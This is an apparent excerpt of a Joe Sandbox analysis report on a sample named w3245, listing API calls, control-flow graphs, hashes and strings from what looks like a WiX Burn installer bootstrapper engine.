                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                              • Opcode ID: e50b6e0d6e6635cd68b618e940fe68ee4fad15d6f040e88e658c716a9d27de17
                                                                                                                                                              • Instruction ID: 45cdcfb4e3239d7a6d2cfee80b35d3b65a28d99a1bf38f122646a8f0b5efc851
                                                                                                                                                              • Opcode Fuzzy Hash: e50b6e0d6e6635cd68b618e940fe68ee4fad15d6f040e88e658c716a9d27de17
                                                                                                                                                              • Instruction Fuzzy Hash: A9C012321A420CABCB406FF8EC0EC9A3BACBB286027048410B905C3120C738E0108B60
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007CE058
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007CE736
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                              • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ET|$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                              • API String ID: 336948655-2453070193
                                                                                                                                                              • Opcode ID: a04e0154df55b53a463854f151327e258f954e86720d00a6d49d11304d0fa49c
                                                                                                                                                              • Instruction ID: cc0d9196e6d7ca89711449d93efdae49da9fa8325e21bd7d7f5ba8de811c81fe
                                                                                                                                                              • Opcode Fuzzy Hash: a04e0154df55b53a463854f151327e258f954e86720d00a6d49d11304d0fa49c
                                                                                                                                                              • Instruction Fuzzy Hash: 47329131D40225EBDB219B54CC46FAEB7A8FF14720F11426DF921FB291D7B8AD809B90

                                                                                                                                                              [Control-flow Graph: executed / not executed basic blocks of the function at 007CF9E3; graph rendering not reproduced]
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ET|$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
                                                                                                                                                              • API String ID: 760788290-2524221868
                                                                                                                                                              • Opcode ID: c3618e8b0ad503c2e89630e7406494e3164d8110378574ca39e5094cdbe8ef73
                                                                                                                                                              • Instruction ID: d298828534614b90f575026ce455e2c2a77d6125c374975d0dc550e044fece4a
                                                                                                                                                              • Opcode Fuzzy Hash: c3618e8b0ad503c2e89630e7406494e3164d8110378574ca39e5094cdbe8ef73
                                                                                                                                                              • Instruction Fuzzy Hash: 6EE1C432E44625BACF219A64CC46FEDB7AAFF05720F11023DFE21F6291C7699D8096D1

                                                                                                                                                              [Control-flow Graph: executed / not executed basic blocks of the function at 007CB48B; graph rendering not reproduced]
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB502
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB550
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB556
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,aD|H,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB59E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB5A4
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB601
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB607
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB650
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB656
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB6C7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB6CD
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB716
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB71C
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB765
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB76B
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB7B7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB7BD
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB810
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB872
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB8FC
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB906
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                              • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aD|H$burn$section.cpp
                                                                                                                                                              • API String ID: 3411815225-3781528417
                                                                                                                                                              • Opcode ID: 0f2db7f0f9439460780365f31ce51f6f8f50789d3cf002b6bf32ba0162cca00a
                                                                                                                                                              • Instruction ID: 913cd666353541550d0c66ebce3ae663d958030123ac4f830e30e7d7b0f2aec1
                                                                                                                                                              • Opcode Fuzzy Hash: 0f2db7f0f9439460780365f31ce51f6f8f50789d3cf002b6bf32ba0162cca00a
                                                                                                                                                              • Instruction Fuzzy Hash: 5E12A076A40629EBDB709A54CC4AFAB77A4FB04710F1142ADFD14FB281E7799D408BE0

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 587 7e0d16-7e0d2d SetEvent 588 7e0d6f-7e0d7d WaitForSingleObject 587->588 589 7e0d2f-7e0d39 GetLastError 587->589 592 7e0d7f-7e0d89 GetLastError 588->592 593 7e0db4-7e0dbf ResetEvent 588->593 590 7e0d3b-7e0d44 589->590 591 7e0d46 589->591 590->591 596 7e0d4d-7e0d5d call 7c3821 591->596 597 7e0d48 591->597 594 7e0d8b-7e0d94 592->594 595 7e0d96 592->595 598 7e0df9-7e0dff 593->598 599 7e0dc1-7e0dcb GetLastError 593->599 594->595 600 7e0d9d-7e0db2 call 7c3821 595->600 601 7e0d98 595->601 618 7e0d62-7e0d6a call 800237 596->618 597->596 605 7e0e32-7e0e4b call 7c21ac 598->605 606 7e0e01-7e0e04 598->606 602 7e0dcd-7e0dd6 599->602 603 7e0dd8 599->603 600->618 601->600 602->603 611 7e0ddf-7e0df4 call 7c3821 603->611 612 7e0dda 603->612 621 7e0e4d-7e0e5e call 800237 605->621 622 7e0e63-7e0e6e SetEvent 605->622 607 7e0e28-7e0e2d 606->607 608 7e0e06-7e0e23 call 7c3821 606->608 615 7e10e8-7e10ed 607->615 627 7e10de-7e10e4 call 800237 608->627 611->618 612->611 623 7e10ef 615->623 624 7e10f2-7e10f8 615->624 618->615 641 7e10e5-7e10e7 621->641 629 7e0ea8-7e0eb6 WaitForSingleObject 622->629 630 7e0e70-7e0e7a GetLastError 622->630 623->624 627->641 632 7e0eb8-7e0ec2 GetLastError 629->632 633 7e0ef0-7e0efb ResetEvent 629->633 636 7e0e7c-7e0e85 630->636 637 7e0e87 630->637 638 7e0ecf 632->638 639 7e0ec4-7e0ecd 632->639 642 7e0efd-7e0f07 GetLastError 633->642 643 7e0f35-7e0f3c 633->643 636->637 644 7e0e8e-7e0ea3 call 7c3821 637->644 645 7e0e89 637->645 649 7e0ed6-7e0eeb call 7c3821 638->649 650 7e0ed1 638->650 639->638 641->615 651 7e0f09-7e0f12 642->651 652 7e0f14 642->652 647 7e0f3e-7e0f41 643->647 648 7e0fab-7e0fce CreateFileW 643->648 662 7e10dd 644->662 645->644 656 7e0f6e-7e0f72 call 7c394f 647->656 657 7e0f43-7e0f46 647->657 654 7e100b-7e101f SetFilePointerEx 648->654 655 7e0fd0-7e0fda GetLastError 648->655 649->662 650->649 651->652 659 7e0f1b-7e0f30 call 7c3821 652->659 660 7e0f16 652->660 668 7e1059-7e1064 SetEndOfFile 654->668 669 7e1021-7e102b GetLastError 654->669 663 7e0fdc-7e0fe5 655->663 664 7e0fe7 655->664 680 7e0f77-7e0f7c 656->680 665 7e0f48-7e0f4b 657->665 666 7e0f67-7e0f69 657->666 659->662 660->659 662->627 663->664 674 7e0fee-7e1001 call 7c3821 664->674 675 7e0fe9 664->675 676 7e0f5d-7e0f62 665->676 677 7e0f4d-7e0f53 665->677 666->615 672 7e109b-7e10a8 SetFilePointerEx 668->672 673 7e1066-7e1070 GetLastError 668->673 678 7e102d-7e1036 669->678 679 7e1038 669->679 672->641 684 7e10aa-7e10b4 GetLastError 672->684 681 7e107d 673->681 682 7e1072-7e107b 673->682 674->654 675->674 676->641 677->676 678->679 687 7e103f-7e1054 call 7c3821 679->687 688 7e103a 679->688 685 7e0f7e-7e0f98 call 7c3821 680->685 686 7e0f9d-7e0fa6 680->686 690 7e107f 681->690 691 7e1084-7e1099 call 7c3821 681->691 682->681 693 7e10b6-7e10bf 684->693 694 7e10c1 684->694 685->662 686->641 687->662 688->687 690->691 691->662 693->694 698 7e10c8-7e10d8 call 7c3821 694->698 699 7e10c3 694->699 698->662 699->698
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,007E08BC,?,?), ref: 007E0D25
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0D2F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,007E08BC,?,?), ref: 007E0D74
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0D7F
                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,?,007E08BC,?,?), ref: 007E0DB7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 1865021742-2104912459
                                                                                                                                                              • Opcode ID: 67666f06e8bdf4c52046c411e23c0c400f38cd8858bc63d6fc533148c3c055c2
                                                                                                                                                              • Instruction ID: 8a4e97da0240b2b94dfe6ead613ac2dae45fff0a2ff3dfdae6b2f4907528746a
                                                                                                                                                              • Opcode Fuzzy Hash: 67666f06e8bdf4c52046c411e23c0c400f38cd8858bc63d6fc533148c3c055c2
                                                                                                                                                              • Instruction Fuzzy Hash: 4591FD37A83672A7D73516A68D0AF566954FF08B30F114225BE20FE6C0D7ADDC8096D1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 1069 7c4d39-7c4d81 call 7ef8e0 call 7c33c7 1074 7c4d95-7c4d9f call 7d98f7 1069->1074 1075 7c4d83-7c4d90 call 800237 1069->1075 1081 7c4da8-7c4db7 call 7d98fd 1074->1081 1082 7c4da1-7c4da6 1074->1082 1080 7c4f31-7c4f3b 1075->1080 1083 7c4f3d-7c4f42 CloseHandle 1080->1083 1084 7c4f46-7c4f4a 1080->1084 1087 7c4dbc-7c4dc0 1081->1087 1085 7c4ddd-7c4df8 call 7c1f13 1082->1085 1083->1084 1089 7c4f4c-7c4f51 CloseHandle 1084->1089 1090 7c4f55-7c4f59 1084->1090 1099 7c4dfa-7c4dff 1085->1099 1100 7c4e01-7c4e15 call 7d6a57 1085->1100 1091 7c4dd7-7c4dda 1087->1091 1092 7c4dc2 1087->1092 1089->1090 1093 7c4f5b-7c4f60 CloseHandle 1090->1093 1094 7c4f64-7c4f66 1090->1094 1091->1085 1096 7c4dc7-7c4dd2 call 800237 1092->1096 1093->1094 1097 7c4f68-7c4f69 CloseHandle 1094->1097 1098 7c4f6b-7c4f7f call 7c2782 * 2 1094->1098 1096->1080 1097->1098 1114 7c4f89-7c4f8d 1098->1114 1115 7c4f81-7c4f84 call 805636 1098->1115 1099->1096 1108 7c4e2f-7c4e43 call 7d6b13 1100->1108 1109 7c4e17 1100->1109 1118 7c4e4c-7c4e67 call 7c1f55 1108->1118 1119 7c4e45-7c4e4a 1108->1119 1112 7c4e1c 1109->1112 1116 7c4e21-7c4e2a call 800237 1112->1116 1121 7c4f8f-7c4f92 call 805636 1114->1121 1122 7c4f97-7c4f9f 1114->1122 1115->1114 1126 7c4f2e 1116->1126 1128 7c4e69-7c4e6e 1118->1128 1129 7c4e73-7c4e8c call 7c1f55 1118->1129 1119->1112 1121->1122 1126->1080 1128->1096 1132 7c4e8e-7c4e93 1129->1132 1133 7c4e98-7c4ec4 CreateProcessW 1129->1133 1132->1096 1134 7c4ec6-7c4ed0 GetLastError 1133->1134 1135 7c4f01-7c4f17 call 800a28 1133->1135 1136 7c4edd 1134->1136 1137 7c4ed2-7c4edb 1134->1137 1141 7c4f1c-7c4f20 1135->1141 1139 7c4edf 1136->1139 1140 7c4ee4-7c4efc call 7c3821 1136->1140 1137->1136 1139->1140 1140->1116 1141->1080 1143 7c4f22-7c4f29 call 800237 1141->1143 1143->1126
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F40
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F4F
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F5E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F69
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to launch clean room process: %ls, xrefs: 007C4EF7
                                                                                                                                                              • Failed to wait for clean room process: %ls, xrefs: 007C4F23
                                                                                                                                                              • burn.filehandle.self, xrefs: 007C4E45
                                                                                                                                                              • %ls %ls, xrefs: 007C4E55
                                                                                                                                                              • D, xrefs: 007C4EA9
                                                                                                                                                              • "%ls" %ls, xrefs: 007C4E7A
                                                                                                                                                              • Failed to allocate parameters for unelevated process., xrefs: 007C4DFA
                                                                                                                                                              • burn.filehandle.attached, xrefs: 007C4E17
                                                                                                                                                              • -%ls="%ls", xrefs: 007C4DE6
                                                                                                                                                              • burn.clean.room, xrefs: 007C4DDE
                                                                                                                                                              • Failed to append original command line., xrefs: 007C4E69
                                                                                                                                                              • Failed to append %ls, xrefs: 007C4E1C
                                                                                                                                                              • Failed to get path for current process., xrefs: 007C4D83
                                                                                                                                                              • engine.cpp, xrefs: 007C4EEA
                                                                                                                                                              • Failed to allocate full command-line., xrefs: 007C4E8E
                                                                                                                                                              • Failed to cache to clean room., xrefs: 007C4DC2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$FileModuleName
                                                                                                                                                              • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                              • API String ID: 3884789274-2391192076
                                                                                                                                                              • Opcode ID: 69fc86ca36a50e824ea6a5e400891aa5b909a19aeb12865c6c2b5635432661f0
                                                                                                                                                              • Instruction ID: 084fa8a731b7b83e0ae4d19fab5c7c1592d9ba4bfd11145149ea9891bbee82c4
                                                                                                                                                              • Opcode Fuzzy Hash: 69fc86ca36a50e824ea6a5e400891aa5b909a19aeb12865c6c2b5635432661f0
                                                                                                                                                              • Instruction Fuzzy Hash: EE719272D00229ABDB219A94CC55FEEBB78FF04720F15422DF920F7291D7789A019BE1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 1146 7d752a-7d756f call 7ef8e0 call 7c762c 1151 7d757b-7d758c call 7cc407 1146->1151 1152 7d7571-7d7576 1146->1152 1157 7d758e-7d7593 1151->1157 1158 7d7598-7d75a9 call 7cc26e 1151->1158 1154 7d7814-7d781b call 800237 1152->1154 1161 7d781c-7d7821 1154->1161 1157->1154 1168 7d75ab-7d75b0 1158->1168 1169 7d75b5-7d75ca call 7cc4c8 1158->1169 1162 7d7829-7d782d 1161->1162 1163 7d7823-7d7824 call 805636 1161->1163 1166 7d782f-7d7832 call 805636 1162->1166 1167 7d7837-7d783c 1162->1167 1163->1162 1166->1167 1171 7d783e-7d783f call 805636 1167->1171 1172 7d7844-7d7851 call 7cc1bb 1167->1172 1168->1154 1178 7d75cc-7d75d1 1169->1178 1179 7d75d6-7d75e6 call 7ec001 1169->1179 1171->1172 1180 7d785b-7d785f 1172->1180 1181 7d7853-7d7856 call 805636 1172->1181 1178->1154 1189 7d75e8-7d75ed 1179->1189 1190 7d75f2-7d7665 call 7d5c33 1179->1190 1185 7d7869-7d786d 1180->1185 1186 7d7861-7d7864 call 805636 1180->1186 1181->1180 1187 7d786f-7d7872 call 7c3a16 1185->1187 1188 7d7877-7d787f 1185->1188 1186->1185 1187->1188 1189->1154 1195 7d7667-7d766c 1190->1195 1196 7d7671-7d7676 1190->1196 1195->1154 1197 7d767d-7d7698 call 7c5602 GetCurrentProcess call 800879 1196->1197 1198 7d7678 1196->1198 1202 7d769d-7d76b4 call 7c827b 1197->1202 1198->1197 1205 7d76ce-7d76e5 call 7c827b 1202->1205 1206 7d76b6 1202->1206 1211 7d76ee-7d76f3 1205->1211 1212 7d76e7-7d76ec 1205->1212 1208 7d76bb-7d76c9 call 800237 1206->1208 1208->1161 1214 7d774f-7d7754 1211->1214 1215 7d76f5-7d7707 call 7c821f 1211->1215 1212->1208 1216 7d7774-7d777d 1214->1216 1217 7d7756-7d7768 call 7c821f 1214->1217 1225 7d7709-7d770e 1215->1225 1226 7d7713-7d7723 call 7c3436 1215->1226 1220 7d777f-7d7782 1216->1220 1221 7d7789-7d779d call 7da50c 1216->1221 1217->1216 1228 7d776a-7d776f 1217->1228 1220->1221 1224 7d7784-7d7787 1220->1224 1233 7d779f-7d77a4 1221->1233 1234 7d77a6 1221->1234 1224->1221 1229 7d77ac-7d77af 1224->1229 1225->1154 1238 7d772f-7d7743 call 7c821f 1226->1238 1239 7d7725-7d772a 1226->1239 1228->1154 1235 7d77b6-7d77cc call 7cd5a0 1229->1235 1236 7d77b1-7d77b4 1229->1236 1233->1154 1234->1229 1242 7d77ce-7d77d3 1235->1242 1243 7d77d5-7d77ed call 7ccbc5 1235->1243 1236->1161 1236->1235 1238->1214 1245 7d7745-7d774a 1238->1245 1239->1154 1242->1154 1248 7d77ef-7d77f4 1243->1248 1249 7d77f6-7d780d call 7cc8e6 1243->1249 1245->1154 1248->1154 1249->1161 1252 7d780f 1249->1252 1252->1154
                                                                                                                                                              Strings
• Failed to extract bootstrapper application payloads., xrefs: 007D77EF
• Failed to load manifest., xrefs: 007D75E8
• Failed to set original source variable., xrefs: 007D776A
• Failed to overwrite the %ls built-in variable., xrefs: 007D76BB
• Failed to open attached UX container., xrefs: 007D758E
• WixBundleOriginalSource, xrefs: 007D7759
• Failed to get unique temporary folder for bootstrapper application., xrefs: 007D77CE
• Failed to get manifest stream from container., xrefs: 007D75CC
• Failed to load catalog files., xrefs: 007D780F
• Failed to get source process folder from path., xrefs: 007D7725
• WixBundleUILevel, xrefs: 007D76D6, 007D76E7
• WixBundleSourceProcessFolder, xrefs: 007D7734
• Failed to initialize variables., xrefs: 007D7571
• WixBundleSourceProcessPath, xrefs: 007D76F8
• Failed to set source process folder variable., xrefs: 007D7745
• WixBundleElevated, xrefs: 007D76A5, 007D76B6
• Failed to parse command line., xrefs: 007D7667
• Failed to set source process path variable., xrefs: 007D7709
• Failed to open manifest stream., xrefs: 007D75AB
• Failed to initialize internal cache functionality., xrefs: 007D779F
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
